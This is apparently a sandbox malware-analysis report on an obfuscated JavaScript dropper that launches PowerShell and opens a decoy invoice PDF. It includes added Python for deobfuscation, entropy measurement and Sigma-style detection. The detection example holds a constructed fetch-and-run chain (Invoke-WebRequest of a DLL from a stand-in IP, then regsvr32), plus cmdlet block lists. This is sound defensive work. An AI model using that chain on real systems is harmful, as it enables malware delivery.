12071652839003777.js
initial sample

Filetype: ASCII text, with very long lines (15969), with CRLF line terminators
Entropy: 4.899679662697007
Filename: 12071652839003777.js
Filesize: 19450
MD5: 4ed0fdedb55f9e5234c2883fa8187f25
SHA1: a8264a489caf90a188a60404330a39547339e670
SHA256: 98a4271053b20914e44beb872b7f44a4a4371f80fcfd05b00552e838704ac3e5
SHA512: f3cd23a948d214084bc87f49bdd48dd8cea44d2768d8070e105e4e23acf9a935db271d36ecc2b84771ee976d6c4feca09400761b5ed9e923204a5da20d854c3f
SSDEEP: 384:1DghNQ9Url0CPSo/6dDt5sluZbO3/m3TMcZVgTnz4MKraVeZQ36l3AMa:VqNQ9UBhKo2DJZQ361AMa
Preview: function ahogkcmwc(){xgyvqios=[1031,3079,5127,4103,2055,3072];var lgprgir=this[oqlyoud+pwplig+xzucopd+hxctjypl+cteyx+sxkktpopk+sxaspobp+dlzlkap](this[tusbbyqnk+vgfitbr+bmoborbtw+xzucopd+soqaakpn+oqlyoud+dlzlkap][doinddx+xzucopd+cteyx+pwplig+dlzlkap+cteyx+

Signature Hits | Behavior Group | Mitre Attack
JavaScript source code contains functionality to generate code involving a shell, file or stream | Software Vulnerabilities | -
Java / VBScript file with very long strings (likely obfuscated code) | System Summary | Obfuscated Files or Information
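The preview shows the sample's obfuscation in a single line: a numeric array, and property names that are never written out but assembled at run time from concatenated identifier fragments and used as computed member accesses (this[oqlyoud+pwplig+...]). A static pass that collects the fragment assignments and folds every chain whose fragments are all known back into a string literal recovers the API names without executing the script. The Python below is an added example, not code from the report or from the sample; SAMPLE_JS is a constructed stand-in in which the fragment identifiers are borrowed from the preview but their values (spelling WScript, CreateObject and Shell) and arrangement are assumptions, because the preview does not include the assignments.

```python
"""Static resolver for the this[a+b+c] member-name obfuscation seen in the preview.

Added example; not code from the report or the sample. SAMPLE_JS is a
constructed stand-in: fragment identifiers come from the preview, their
string values and arrangement are assumptions made for the demonstration.
"""
from __future__ import annotations

import re

# Constructed input (assumption): fragments spell WScript / CreateObject / Shell.
SAMPLE_JS = r'''
var oqlyoud="WS",pwplig="cr",xzucopd="ip",hxctjypl="t";
var tusbbyqnk="Cre",vgfitbr="ate",bmoborbtw="Obj",soqaakpn="ect";
var doinddx="Sh",cteyx="el",sxkktpopk="l";
function ahogkcmwc(){xgyvqios=[1031,3079,5127,4103,2055,3072];
var lgprgir=this[oqlyoud+pwplig+xzucopd+hxctjypl][tusbbyqnk+vgfitbr+bmoborbtw+soqaakpn](doinddx+cteyx+sxkktpopk);}
'''

IDENT = r"[A-Za-z_$][\w$]*"
# name="literal"  (double-quoted, backslash escapes allowed inside)
ASSIGN_RE = re.compile(rf'({IDENT})\s*=\s*"((?:[^"\\]|\\.)*)"')
# two or more identifiers joined by '+', not embedded in a longer name
CONCAT_RE = re.compile(rf"(?<![\w$])({IDENT}(?:\s*\+\s*{IDENT})+)(?![\w$])")

# WSH/ActiveX entry points whose appearance after resolution is what the
# "shell, file or stream" signature is looking for.
WATCHLIST = {
    "WScript", "ActiveXObject", "CreateObject", "Shell", "Run", "Exec",
    "ADODB.Stream", "SaveToFile", "Scripting.FileSystemObject", "eval",
}


def collect_fragments(js: str) -> dict[str, str]:
    """Map every  name="literal"  assignment in the script to its value."""
    return {name: value for name, value in ASSIGN_RE.findall(js)}


def resolve_concats(js: str, frags: dict[str, str]) -> tuple[str, list[str]]:
    """Fold a+b+c chains whose fragments are all known into one string literal.

    Returns the rewritten script and the folded strings in order of appearance.
    A chain containing an unknown fragment is left untouched rather than guessed.
    """
    resolved: list[str] = []

    def fold(m: re.Match) -> str:
        parts = [p.strip() for p in m.group(1).split("+")]
        if not all(p in frags for p in parts):
            return m.group(0)
        value = "".join(frags[p] for p in parts)
        resolved.append(value)
        return f'"{value}"'

    return CONCAT_RE.sub(fold, js), resolved


def flag_api_names(resolved: list[str]) -> list[str]:
    """Resolved names that match the automation watchlist, in order."""
    return [n for n in resolved if n in WATCHLIST]


def longest_line(js: str) -> int:
    """Length of the longest line; the report's file(1) output gives 15969 for the real sample."""
    return max(len(line) for line in js.splitlines()) if js else 0


if __name__ == "__main__":
    frags = collect_fragments(SAMPLE_JS)
    cleaned, names = resolve_concats(SAMPLE_JS, frags)
    print(cleaned)
    print("resolved:", names, "flagged:", flag_api_names(names))
```

Run as-is it prints the rewritten call, this["WScript"]["CreateObject"]("Shell"), and the three watchlist hits. Chains that include a fragment assigned some other way (array indexing, string methods, eval) stay unresolved on purpose; for those the next step is an instrumented WSH run or a debugger, not a guess.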

File: C:\Users\user\AppData\Local\Temp\invoice.pdf
Category: dropped
Dump: invoice.pdf.4.dr
ID: dr_2
Target ID: 4
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type: PDF document, version 1.7
Entropy: 7.929592005409041
Encrypted: false
Ssdeep: 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ
Size: 635764
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Sigma detected: Powershell launch regsvr32 | HIPS / PFW / Operating System Protection Evasion | -
Gathers information about network shares | Stealing of Sensitive Information | -
Sigma detected: Suspicious Invoke-WebRequest Execution | System Summary | -
Sigma detected: Suspicious Script Execution From Temp Folder | System Summary | -
Suspicious powershell command line found | Data Obfuscation | -
Wscript starts Powershell (via cmd or directly) | System Summary | -
Creates a process in suspended mode (likely to inject code) | HIPS / PFW / Operating System Protection Evasion | -
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process | System Summary | -
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest | System Summary | -
Sigma detected: PowerShell Script Run in AppData | System Summary | -
Sigma detected: PowerShell Web Download | System Summary | -
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP | System Summary | -
Sigma detected: Usage Of Web Request Commands And Cmdlets | System Summary | -
Sigma detected: Non Interactive PowerShell Process Spawned | System Summary | -
Spawns processes | System Summary | -

The signature hits in this table describe the behaviour of the process that wrote the file (powershell.exe, target ID 4, launched from wscript.exe: a web request to a direct IP, a DLL fetched with Invoke-WebRequest, regsvr32 started, a process created suspended), not the content of the PDF. It is the only PDF among the dropped files listed; Acrobat.exe (target ID 5) and its AcroCEF.exe renderer (target IDs 8 and 10) account for the Adobe cache, font-list, SOPHIA and NGL licensing files further down, all of them normal Acrobat start-up artifacts, which is consistent with the document being displayed as a decoy while the PowerShell stage runs.
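Every Sigma hit in the table above is a process-creation rule, so the same chain can be caught from Sysmon event 1 or Security event 4688 data without a sandbox. The Python below is an added example, not the sandbox vendor's or the Sigma project's rule code: each check is a simplified paraphrase of the rule named in its label, and the three events are constructed, since the report does not show the real command lines (203.0.113.10 is an RFC 5737 documentation address and stage.dll a hypothetical file name).

```python
"""Process-creation checks mirroring the signature hits attached to invoice.pdf.

Added example; neither the sandbox's nor the Sigma project's rule code. Each
check is a simplified paraphrase of the rule it is labelled with, and the
events are constructed (203.0.113.10 is an RFC 5737 documentation address).
"""
from __future__ import annotations

import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_CHILDREN = POWERSHELL | {
    "cmd.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "certutil.exe", "bitsadmin.exe", "msiexec.exe",
}
WEB_CMDLETS = ("invoke-webrequest", "iwr ", "invoke-restmethod", "irm ",
               "downloadstring", "downloadfile", "start-bitstransfer",
               "curl ", "wget ")
USER_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\desktop\\",
             "\\downloads\\", "\\programdata\\")
DIRECT_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I)

# Constructed events shaped like Sysmon event 1 / Security 4688 fields.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": (r'powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden '
                     r'-Command "Invoke-WebRequest http://203.0.113.10/stage.dll '
                     r'-OutFile C:\Users\user\AppData\Local\Temp\stage.dll"')},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\user\AppData\Local\Temp\stage.dll"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},   # an operator opening a console
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def check_event(ev: dict[str, str]) -> list[str]:
    """Names of the (simplified) rules one process-creation event satisfies."""
    image, parent = base(ev["Image"]), base(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    web = any(k in cmd for k in WEB_CMDLETS)
    hits: list[str] = []
    if parent in SCRIPT_HOSTS and image in SUSPICIOUS_CHILDREN:
        hits.append("Cscript/Wscript Potentially Suspicious Child Process")
        if image in POWERSHELL or image == "cmd.exe":
            hits.append("Wscript starts Powershell (via cmd or directly)")
    if web:
        hits.append("Usage Of Web Request Commands And Cmdlets")
        if DIRECT_IP_URL.search(cmd):
            hits.append("Suspicious Invoke-WebRequest Execution With DirectIP")
        if "-outfile" in cmd and any(d in cmd for d in USER_DIRS):
            hits.append("Suspicious Invoke-WebRequest Execution")
    if image in POWERSHELL:
        if web:
            hits.append("PowerShell Web Download")
            if ".dll" in cmd:
                hits.append("Potential DLL File Download Via PowerShell Invoke-WebRequest")
        if "\\appdata\\" in cmd:
            hits.append("PowerShell Script Run in AppData")
        if parent != "explorer.exe":   # no interactive shell as parent
            hits.append("Non Interactive PowerShell Process Spawned")
    if (image in POWERSHELL or image in SCRIPT_HOSTS) and "\\temp\\" in cmd:
        hits.append("Suspicious Script Execution From Temp Folder")
    if parent in POWERSHELL and image == "regsvr32.exe":
        hits.append("Powershell launch regsvr32")
    return hits


def scan(events: list[dict[str, str]]) -> list[list[str]]:
    """Apply check_event to every event, preserving order."""
    return [check_event(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(EVENTS, scan(EVENTS)):
        print(base(ev["ParentImage"]), "->", base(ev["Image"]))
        for h in hits:
            print("   ", h)
```

The first constructed event alone trips ten of the listed rules, which is the point of this chain: wscript.exe as parent, a direct-IP Invoke-WebRequest, a DLL written to Temp, non-interactive PowerShell. "Gathers information about network shares" and "Creates a process in suspended mode" are not process-creation observations (the sandbox derives them from API-level tracing) and are outside this event model.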

File: C:\ProgramData\Microsoft\Network\Downloader\edb.log
Category: dropped
Dump: edb.log.9.dr
ID: dr_51
Target ID: 9
Process: C:\Windows\System32\svchost.exe
Type: data
Entropy: 0.8021893244871938
Encrypted: false
Ssdeep: 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAA:RJE+Lfki1GjHwU/+vVhWqpx
Size: 1310720
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Queries the volume information (name, serial number etc) of a device | Language, Device and Operating System Detection | System Information Discovery

File: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Category: dropped
Dump: qmgr.db.9.dr
ID: dr_49
Target ID: 9
Process: C:\Windows\System32\svchost.exe
Type: Extensible storage engine DataBase, version 0x620, checksum 0xf5919c3c, page size 16384, DirtyShutdown, Windows version 10.0
Entropy: 0.943339834598836
Encrypted: false
Ssdeep: 1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
Size: 1048576
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Queries the volume information (name, serial number etc) of a device | Language, Device and Operating System Detection | System Information Discovery

File: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Category: dropped
Dump: qmgr.jfm.9.dr
ID: dr_50
Target ID: 9
Process: C:\Windows\System32\svchost.exe
Type: data
Entropy: 0.08137462201530167
Encrypted: false
Ssdeep: 3:mlXKYeVZkYll/nqlFcl1ZUllllgZZkYkllallGBnX/l/Tj/k7/t:mlXKzVxl/qlFclQ/l4aJlA254
Size: 16384
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Queries the volume information (name, serial number etc) of a device | Language, Device and Operating System Detection | System Information Discovery

These three files are the BITS service's job store under C:\ProgramData\Microsoft\Network\Downloader: qmgr.db is the ESE database, edb.log its transaction log and qmgr.jfm its flush-map file. They are rewritten whenever the BITS svchost.exe (target ID 9) is active, so they show that BITS ran during the analysis but not what, if anything, it transferred; the DirtyShutdown state in the type string only means the database was dumped while still open. Correlate with the network and BITS job data of the run before reading anything into them.

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
Category: dropped
Dump: LOG1.8.dr
ID: dr_43
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.119264736293105
Encrypted: false
Ssdeep: 6:iOZUh+q2PCHhJ2nKuAl9OmbnIFUtRZXWZmw/ZiVkwOCHhJ2nKuAl9OmbjLJ:7qh+vBHAahFUtRpW//UV56HAaSJ
Size: 294
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
Category: dropped
Dump: LOG1.8.dr
ID: dr_46
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.119264736293105
Encrypted: false
Ssdeep: 6:iOZUh+q2PCHhJ2nKuAl9OmbnIFUtRZXWZmw/ZiVkwOCHhJ2nKuAl9OmbjLJ:7qh+vBHAahFUtRpW//UV56HAaSJ
Size: 294
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Category: dropped
Dump: LOG0.8.dr
ID: dr_42
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.137355499898155
Encrypted: false
Ssdeep: 6:iORqN+q2PCHhJ2nKuAl9Ombzo2jMGIFUtLrZmwtJVkwOCHhJ2nKuAl9Ombzo2jM4:7RqN+vBHAa8uFUtLr/tJV56HAa8RJ
Size: 338
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Category: dropped
Dump: LOG0.8.dr
ID: dr_47
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.137355499898155
Encrypted: false
Ssdeep: 6:iORqN+q2PCHhJ2nKuAl9Ombzo2jMGIFUtLrZmwtJVkwOCHhJ2nKuAl9Ombzo2jM4:7RqN+vBHAa8uFUtLr/tJV56HAa8RJ
Size: 338
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Category: dropped
Dump: ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp.10.dr
ID: dr_54
Target ID: 10
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: JSON data
Entropy: 4.949441607411077
Encrypted: false
Ssdeep: 12:YH/um3RA8sqg4hsBdOg2HVvcaq3QYiub6P7E4T3y:Y2sRdsIydMHVe3QYhbS7nby
Size: 475
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp
Category: modified
Dump: ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp.10.dr
ID: dr_53
Target ID: 10
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: JSON data
Entropy: 4.949441607411077
Encrypted: false
Ssdeep: 12:YH/um3RA8sqg4hsBdOg2HVvcaq3QYiub6P7E4T3y:Y2sRdsIydMHVe3QYhbS7nby
Size: 475
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Category: dropped
Dump: 000003.log.8.dr
ID: dr_39
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: data
Entropy: 5.236055981011968
Encrypted: false
Ssdeep: 96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bZ+ns2:S43C4mS7fFi0KFYDjr3LWO3V3aw+bZ+T
Size: 3878
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
Category: dropped
Dump: LOG.8.dr
ID: dr_40
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.116945566963374
Encrypted: false
Ssdeep: 6:iOdu7N+q2PCHhJ2nKuAl9OmbzNMxIFUtdTSGXZmw7jSNVkwOCHhJ2nKuAl9OmbzE:707N+vBHAa8jFUt/X/7uNV56HAa84J
Size: 326
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Category: dropped
Dump: LOG.8.dr
ID: dr_48
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: ASCII text
Entropy: 5.116945566963374
Encrypted: false
Ssdeep: 6:iOdu7N+q2PCHhJ2nKuAl9OmbzNMxIFUtdTSGXZmw7jSNVkwOCHhJ2nKuAl9OmbzE:707N+vBHAa8jFUt/X/7uNV56HAa84J
Size: 326
Whitelisted: false
Reputation: timeout

All nine entries are Chromium Embedded Framework cache, LevelDB and network-state files written by Acrobat's AcroCEF.exe renderer on start-up. Each "(copy)" entry points at the same dump as its original (identical entropy, ssdeep and size), so it adds no content of its own.

File: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Category: dropped
Dump: 2D85F72862B55C4EADD9E66E06947F3D.8.dr
ID: dr_34
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: Certificate, Version=3
Entropy: 7.705940075877404
Encrypted: false
Ssdeep: 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
Size: 1391
Whitelisted: true
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Category: dropped
Dump: 77EC63BDA74BD0D0E0426DC8F8008506.8.dr
ID: dr_44
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Entropy: 7.996617769952133
Encrypted: true
Ssdeep: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
Size: 71954
Whitelisted: false
Reputation: timeout

Both files are Windows CryptoAPI network-cache artifacts created while AcroCEF.exe validated a certificate chain: a DER certificate fetched during chain building, and the authroot.stl cabinet that Windows downloads to refresh its trusted-root list. The cabinet is marked Encrypted: true only because its MSZIP-compressed payload (compression type 0x1) pushes the entropy to 7.9966; compressed and encrypted data are indistinguishable by entropy alone, so the flag is not evidence of malicious packing here.
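The cabinet above is the only file in this report marked Encrypted: true, at an entropy of 7.9966, while the PDF dropped by PowerShell sits at 7.9296 and is not flagged. The Entropy column is Shannon entropy in bits per byte (the 0.8112781244591328 listed further down for the 4-byte TESTING file is exactly the value for three identical bytes plus one different one), and the Encrypted flag behaves like a threshold on it. The Python below is an added example, not the sandbox's code: it computes the statistic on constructed inputs and uses an assumed cut-off of 7.99, which separates the two files on this page but is not a value the vendor publishes.

```python
"""Shannon entropy in bits per byte, the statistic behind the report's Entropy column.

Added example, not the report's own code. Reproduces the 0.8112781244591328
reported for the 4-byte TESTING file from a constructed byte string with the
same symbol distribution. The 7.99 threshold is an assumption (see lead-in).
"""
from __future__ import annotations

import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """0.0 for a single repeated value, 8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.99) -> bool:
    """Entropy-only heuristic; the threshold is an assumption, not the vendor's.

    Compressed payloads (an MSZIP cabinet, a deflated PDF stream) clear it just
    as ciphertext does, so True is a prompt to inspect the container, not a verdict.
    """
    return shannon_entropy(data) >= threshold


def pseudo_random(n: int, seed: int = 1) -> bytes:
    """Deterministic stand-in for ciphertext / well-compressed data (constructed)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed samples; "aaab" mirrors the TESTING file's 3-of-4 distribution.
SAMPLES = {
    "zeros": b"\x00" * 4096,
    "aaab": b"aaab",
    "uniform": bytes(range(256)) * 16,
    "prng_64k": pseudo_random(65536),
}


def report(samples: dict[str, bytes] | None = None) -> dict[str, tuple[float, bool]]:
    """Entropy and heuristic verdict per sample, in insertion order."""
    samples = SAMPLES if samples is None else samples
    return {name: (shannon_entropy(d), looks_encrypted(d)) for name, d in samples.items()}


if __name__ == "__main__":
    for name, (h, flagged) in report().items():
        print(f"{name:9s} entropy={h:.6f} encrypted?={flagged}")
```

The only sample that clears the cut-off is the seeded PRNG stream, which is what both ciphertext and a well-compressed payload look like to this measure; that is why an MSZIP cabinet holding a certificate trust list scores as "encrypted". Use the flag to pick files whose container format and magic bytes deserve a look, not as evidence of packing on its own.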

File: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Category: dropped
Dump: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr
ID: dr_35
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: data
Entropy: 2.7425532007658724
Encrypted: false
Ssdeep: 3:kkFkl6VDtfllXlE/HT8kymhttNNX8RolJuRdxLlGB9lQRYwpDdt:kKjFeT8y3NMa8RdWBwRd
Size: 192
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Category: dropped
Dump: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr
ID: dr_45
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: data
Entropy: 3.139179158420051
Encrypted: false
Ssdeep: 6:kKlanM/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:msiDnLNkPlE99SNxAhUe/3
Size: 328
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
Category: dropped
Dump: AdobeFnt23.lst.52720.5.dr
ID: dr_33
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: PostScript document text
Entropy: 5.233980037532449
Encrypted: false
Ssdeep: 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
Size: 1233
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5272
Category: dropped
Dump: AdobeFnt23.lst.52720.5.dr
ID: dr_22
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: PostScript document text
Entropy: 5.233980037532449
Encrypted: false
Ssdeep: 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
Size: 1233
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
Category: dropped
Dump: AdobeFnt23.lst.52720.5.dr
ID: dr_32
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: PostScript document text
Entropy: 5.233980037532449
Encrypted: false
Ssdeep: 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
Size: 1233
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
Category: dropped
Dump: AdobeFnt23.lst.5272.5.dr
ID: dr_31
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: PostScript document text
Entropy: 5.214360287289079
Encrypted: false
Ssdeep: 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
Size: 10880
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5272
Category: dropped
Dump: AdobeFnt23.lst.5272.5.dr
ID: dr_21
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: PostScript document text
Entropy: 5.214360287289079
Encrypted: false
Ssdeep: 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
Size: 10880
Whitelisted: false
Reputation: timeout

These are Acrobat's font-list caches (the ".5272" suffix is the PID of the Acrobat.exe instance that wrote them), rebuilt on first launch in a fresh profile; the "(copy)" entries share a dump with their originals.

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Category: dropped
Dump: ACROBAT_READER_MASTER_SURFACEID.5.dr
ID: dr_30
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.35423473953786
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJM3g98kUwPeUkwRe9:YvXKXavzKvR/ZwHAOZGMbLUkee9
Size: 295
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Category: dropped
Dump: DC_FirstMile_Home_View_Surface.5.dr
ID: dr_11
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.292708838579496
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfBoTfXpnrPeUkwRe9:YvXKXavzKvR/ZwHAOZGWTfXcUkee9
Size: 294
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Category: dropped
Dump: DC_FirstMile_Right_Sec_Surface.5.dr
ID: dr_8
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.271415052806375
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfBD2G6UpnrPeUkwRe9:YvXKXavzKvR/ZwHAOZGR22cUkee9
Size: 294
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Category: dropped
Dump: DC_READER_LAUNCH_CARD.5.dr
ID: dr_4
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.330862982687389
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfPmwrPeUkwRe9:YvXKXavzKvR/ZwHAOZGH56Ukee9
Size: 285
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Category: dropped
Dump: DC_Reader_Convert_LHP_Banner.5.dr
ID: dr_28
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.689773975708149
Encrypted: false
Ssdeep: 24:Yv6XabKJhTpLgE9cQx8LennAvzBvkn0RCmK8czOCCS1:YvBKJhThgy6SAFv5Ah8cv/1
Size: 1123
Whitelisted: false
Reputation: timeout

